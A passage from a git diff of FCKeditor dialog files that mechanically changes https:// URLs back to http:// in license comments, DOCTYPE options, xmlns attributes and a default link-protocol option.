"https://www.w3.org/TR/html4/strict.dtd">'> + <option value='<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">'> HTML 4.01 Strict</option> - <option value='<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "https://www.w3.org/TR/html4/frameset.dtd">'> + <option value='<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">'> HTML 4.01 Frameset</option> - <option value='<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'> + <option value='<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'> XHTML 1.0 Transitional</option> - <option value='<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">'> + <option value='<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">'> XHTML 1.0 Strict</option> - <option value='<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">'> + <option value='<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">'> XHTML 1.0 Frameset</option> - <option value='<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "https://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">'> + <option value='<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">'> XHTML 1.1</option> <option value='<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">'>HTML 3.2</option> <option value='<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">'>HTML 2.0</option> diff --git a/admin/FCKeditor/editor/dialog/fck_docprops/fck_document_preview.html b/admin/FCKeditor/editor/dialog/fck_docprops/fck_document_preview.html index c023849..7d0fa94 100755 --- a/admin/FCKeditor/editor/dialog/fck_docprops/fck_document_preview.html +++ b/admin/FCKeditor/editor/dialog/fck_docprops/fck_document_preview.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_find.html b/admin/FCKeditor/editor/dialog/fck_find.html index 501723f..6d772b2 100755 --- a/admin/FCKeditor/editor/dialog/fck_find.html +++ b/admin/FCKeditor/editor/dialog/fck_find.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * "Find" dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_flash.html b/admin/FCKeditor/editor/dialog/fck_flash.html index df81154..e3c1084 100755 --- a/admin/FCKeditor/editor/dialog/fck_flash.html +++ b/admin/FCKeditor/editor/dialog/fck_flash.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_flash/fck_flash.js b/admin/FCKeditor/editor/dialog/fck_flash/fck_flash.js index 4aaf31e..883b4b3 100755 --- a/admin/FCKeditor/editor/dialog/fck_flash/fck_flash.js +++ b/admin/FCKeditor/editor/dialog/fck_flash/fck_flash.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -146,7 +146,7 @@ function Ok() function UpdateEmbed( e ) { SetAttribute( e, 'type' , 'application/x-shockwave-flash' ) ; - SetAttribute( e, 'pluginspage' , 'https://www.macromedia.com/go/getflashplayer' ) ; + SetAttribute( e, 'pluginspage' , 'http://www.macromedia.com/go/getflashplayer' ) ; SetAttribute( e, 'src', GetE('txtUrl').value ) ; SetAttribute( e, "width" , GetE('txtWidth').value ) ; @@ -209,7 +209,7 @@ function UpdatePreview() } } -// <embed id="ePreview" src="fck_flash/claims.swf" width="100%" height="100%" style="visibility:hidden" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer"> +// <embed id="ePreview" src="fck_flash/claims.swf" width="100%" height="100%" style="visibility:hidden" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"> function BrowseServer() { diff --git a/admin/FCKeditor/editor/dialog/fck_flash/fck_flash_preview.html b/admin/FCKeditor/editor/dialog/fck_flash/fck_flash_preview.html index 3795216..4e9381f 100755 --- a/admin/FCKeditor/editor/dialog/fck_flash/fck_flash_preview.html +++ b/admin/FCKeditor/editor/dialog/fck_flash/fck_flash_preview.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_form.html b/admin/FCKeditor/editor/dialog/fck_form.html index e4e3be1..08344c9 100755 --- a/admin/FCKeditor/editor/dialog/fck_form.html +++ b/admin/FCKeditor/editor/dialog/fck_form.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Form dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_hiddenfield.html b/admin/FCKeditor/editor/dialog/fck_hiddenfield.html index e588bb5..0be0643 100755 --- a/admin/FCKeditor/editor/dialog/fck_hiddenfield.html +++ b/admin/FCKeditor/editor/dialog/fck_hiddenfield.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Hidden Field dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hidden Field Properties</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_image.html b/admin/FCKeditor/editor/dialog/fck_image.html index 4a700cb..aa910f1 100755 --- a/admin/FCKeditor/editor/dialog/fck_image.html +++ b/admin/FCKeditor/editor/dialog/fck_image.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Image Properties dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Image Properties</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_image/fck_image.js b/admin/FCKeditor/editor/dialog/fck_image/fck_image.js index 86ad0ca..02ae66e 100755 --- a/admin/FCKeditor/editor/dialog/fck_image/fck_image.js +++ b/admin/FCKeditor/editor/dialog/fck_image/fck_image.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_image/fck_image_preview.html b/admin/FCKeditor/editor/dialog/fck_image/fck_image_preview.html index 700a6a5..58cf771 100755 --- a/admin/FCKeditor/editor/dialog/fck_image/fck_image_preview.html +++ b/admin/FCKeditor/editor/dialog/fck_image/fck_image_preview.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,21 +9,21 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Preview page for the Image dialog window. * - * Curiosity: https://en.wikipedia.org/wiki/Lorem_ipsum + * Curiosity: http://en.wikipedia.org/wiki/Lorem_ipsum --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_link.html b/admin/FCKeditor/editor/dialog/fck_link.html index a6d74f2..ebf7246 100755 --- a/admin/FCKeditor/editor/dialog/fck_link.html +++ b/admin/FCKeditor/editor/dialog/fck_link.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -45,7 +45,7 @@ <td nowrap="nowrap"> <span fckLang="DlgLnkProto">Protocol</span><br /> <select id="cmbLinkProtocol"> - <option value="https://" selected="selected">https://</option> + <option value="http://" selected="selected">http://</option> <option value="https://">https://</option> <option value="ftp://">ftp://</option> <option value="news://">news://</option> diff --git a/admin/FCKeditor/editor/dialog/fck_link/fck_link.js b/admin/FCKeditor/editor/dialog/fck_link/fck_link.js index 98e4628..ab9cc98 100755 --- a/admin/FCKeditor/editor/dialog/fck_link/fck_link.js +++ b/admin/FCKeditor/editor/dialog/fck_link/fck_link.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_listprop.html b/admin/FCKeditor/editor/dialog/fck_listprop.html index 01b0d15..f00ed7c 100755 --- a/admin/FCKeditor/editor/dialog/fck_listprop.html +++ b/admin/FCKeditor/editor/dialog/fck_listprop.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Bulleted List dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_paste.html b/admin/FCKeditor/editor/dialog/fck_paste.html index 043516e..8c54fe6 100755 --- a/admin/FCKeditor/editor/dialog/fck_paste.html +++ b/admin/FCKeditor/editor/dialog/fck_paste.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -23,7 +23,7 @@ * the user is not able to paste data from the clipboard to the editor using * the toolbar buttons or the context menu. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_radiobutton.html b/admin/FCKeditor/editor/dialog/fck_radiobutton.html index 43e6c20..e1b8102 100755 --- a/admin/FCKeditor/editor/dialog/fck_radiobutton.html +++ b/admin/FCKeditor/editor/dialog/fck_radiobutton.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_replace.html b/admin/FCKeditor/editor/dialog/fck_replace.html index 32d76b2..51be736 100755 --- a/admin/FCKeditor/editor/dialog/fck_replace.html +++ b/admin/FCKeditor/editor/dialog/fck_replace.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * "Replace" dialog box window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_select.html b/admin/FCKeditor/editor/dialog/fck_select.html index d82d069..e879782 100755 --- a/admin/FCKeditor/editor/dialog/fck_select.html +++ b/admin/FCKeditor/editor/dialog/fck_select.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_select/fck_select.js b/admin/FCKeditor/editor/dialog/fck_select/fck_select.js index ab3808b..4321804 100755 --- a/admin/FCKeditor/editor/dialog/fck_select/fck_select.js +++ b/admin/FCKeditor/editor/dialog/fck_select/fck_select.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_smiley.html b/admin/FCKeditor/editor/dialog/fck_smiley.html index cd35d77..43d173b 100755 --- a/admin/FCKeditor/editor/dialog/fck_smiley.html +++ b/admin/FCKeditor/editor/dialog/fck_smiley.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Smileys (emoticons) dialog window. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/editor/dialog/fck_source.html b/admin/FCKeditor/editor/dialog/fck_source.html index 610aafd..c367679 100755 --- a/admin/FCKeditor/editor/dialog/fck_source.html +++ b/admin/FCKeditor/editor/dialog/fck_source.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_specialchar.html b/admin/FCKeditor/editor/dialog/fck_specialchar.html index a553467..7dea5bc 100755 --- a/admin/FCKeditor/editor/dialog/fck_specialchar.html +++ b/admin/FCKeditor/editor/dialog/fck_specialchar.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_spellerpages.html b/admin/FCKeditor/editor/dialog/fck_spellerpages.html index 3e4b1cf..60648e1 100755 --- a/admin/FCKeditor/editor/dialog/fck_spellerpages.html +++ b/admin/FCKeditor/editor/dialog/fck_spellerpages.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/dialog/fck_table.html b/admin/FCKeditor/editor/dialog/fck_table.html index eaab977..43b97df 100755 --- a/admin/FCKeditor/editor/dialog/fck_table.html +++ b/admin/FCKeditor/editor/dialog/fck_table.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - 